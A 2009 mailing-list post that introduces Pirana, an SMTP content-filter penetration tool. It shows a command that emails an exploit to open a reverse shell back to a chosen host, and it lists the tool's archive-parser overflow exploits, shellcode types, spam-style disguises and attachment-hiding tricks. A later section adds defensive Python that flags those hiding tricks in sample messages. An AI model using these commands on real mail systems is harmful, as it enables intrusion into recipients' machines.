HackFest Series: Pirana Email Holiday Greetings
Lisa Kachold
lisakachold at obnosis.com
Thu Dec 24 17:48:19 MST 2009
Pirana
PIRANA is a penetration testing framework to help in checking an SMTP
content filter's security. It works by attaching an exploit to an
email, optionally disguising it from content filters. PIRANA also lets
you choose from different types of shellcodes to use and has various
options to be stealthy.
http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf
http://backtrack.offensive-security.com/index.php/Tools#Pirana
Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated
without full links or correct pirana.pl spelling):
http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html
The Bt2 HowTo:
http://www.linuxhaxor.net/?p=337
Solutions to protect include clamav/spamassassin but this could depend
on your spamassassin and other installation specifics.
Pirana.pl example: Connect back with a reverse shell just by sending an email
using cloaking.
$ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
[EMAIL PROTECTED]
Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing
Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachments from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode
Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS
Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell
Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"
Vanishing techniques for attachments:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 <img src="image.JPG" width=0 height=0> trick
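The usage text above names the tricks Pirana uses to keep an attachment out of the recipient's view (the multipart/alternative trick, the zero-size img tag, EICAR padding) and the archive formats its exploits target. The following is an added example of how a filter-side check could flag those layouts; it is my own code, not part of pirana.pl or the original post. It assumes the multipart/alternative trick means placing a non-text attachment among the "alternative" renderings of the body, builds its own constructed sample messages with placeholder attachment bytes, and uses the function names analyze and build_*_sample, which are my choices.

```python
"""Flag the attachment-hiding tricks listed in the Pirana usage text.
Added example with constructed samples; the heuristics and names are mine."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions of the archive/container formats the listed exploits target
# (LHA, ZOO, ARJ, UU). Assumed mapping; extend for your own environment.
RISKY_EXTENSIONS = {".lha", ".lzh", ".zoo", ".arj", ".uu", ".uue"}
IMG_TAG_RE = re.compile(r"<img\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")


def _img_attrs(tag_body):
    """Parse the attributes of one <img ...> tag into a lowercase dict."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag_body)}


def analyze(raw):
    """Return a list of (finding, detail) tuples for one raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    attached_names = set()
    html_bodies = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "multipart/alternative":
            # Real alternatives are text renderings of the same body; a
            # non-text subpart here is only there to hide from the MUA.
            for sub in part.iter_parts():
                if sub.get_content_maintype() not in ("text", "multipart"):
                    findings.append(("multipart-alternative-trick",
                                     sub.get_filename() or sub.get_content_type()))
            continue
        if part.is_multipart():
            continue
        if ctype == "text/html":
            html_bodies.append(part.get_content())
            continue
        fname = part.get_filename()
        if fname:
            attached_names.add(fname.lower())
            ext = "." + fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
            if ext in RISKY_EXTENSIONS:
                findings.append(("risky-archive", fname))
        payload = part.get_payload(decode=True) or b""
        # The EICAR marker is meant to make the scanner stop at a "known" hit.
        if b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE" in payload:
            findings.append(("eicar-padding", fname or ctype))
    for html in html_bodies:
        for tag_body in IMG_TAG_RE.findall(html):
            attrs = _img_attrs(tag_body)
            if attrs.get("width") == "0" and attrs.get("height") == "0":
                src = attrs.get("src", "")
                name = src.split("/")[-1].lower()
                if name.startswith("cid:"):
                    name = name[4:]
                findings.append(("zero-size-img", name if name in attached_names else src))
    return findings


def build_cloaked_sample():
    """Constructed message: spam-style body, HTML part with a zero-size <img>
    pointing at an attachment named like a picture, plus a .zoo attachment
    carrying the EICAR marker. Attachment bytes are placeholders."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "probe@example.invalid"
    msg["Subject"] = "Look at the pictures I promised you!"
    msg.set_content("Look at the pictures I promised you!")
    msg.add_alternative('<html><body><p>Pictures</p>'
                        '<img src="image.JPG" width=0 height=0></body></html>',
                        subtype="html")
    msg.add_attachment(b"placeholder archive bytes (constructed)",
                       maintype="application", subtype="octet-stream",
                       filename="image.JPG")
    msg.add_attachment(b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE marker (constructed)",
                       maintype="application", subtype="octet-stream",
                       filename="pictures.zoo")
    return msg.as_bytes()


def build_alternative_trick_sample():
    """Constructed message whose only attachment sits inside multipart/alternative."""
    msg = EmailMessage()
    msg["Subject"] = "report"
    msg.set_content("Please see the attached report.")
    msg.add_alternative(b"placeholder archive bytes (constructed)",
                        maintype="application", subtype="octet-stream",
                        filename="report.lha")
    return msg.as_bytes()


def build_clean_sample():
    """Constructed plain-text message with nothing to flag."""
    msg = EmailMessage()
    msg["Subject"] = "hello"
    msg.set_content("Merry merry merry!")
    return msg.as_bytes()


if __name__ == "__main__":
    for builder in (build_cloaked_sample, build_alternative_trick_sample, build_clean_sample):
        print(builder.__name__, analyze(builder()))
```

Run as a script it prints the findings for each constructed sample; in a real deployment the same checks would sit in a milter or a SpamAssassin plugin and feed a score rather than a list. Note that the check decides on message layout only; the attachment contents still need the archive handler and antivirus scan that the filter would run anyway.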
Test Test Test!
Merry merry merry!
--
Skype: (623)239-3392
AT&T: (503)754-4452
http://uncyclopedia.wikia.com/wiki/Santa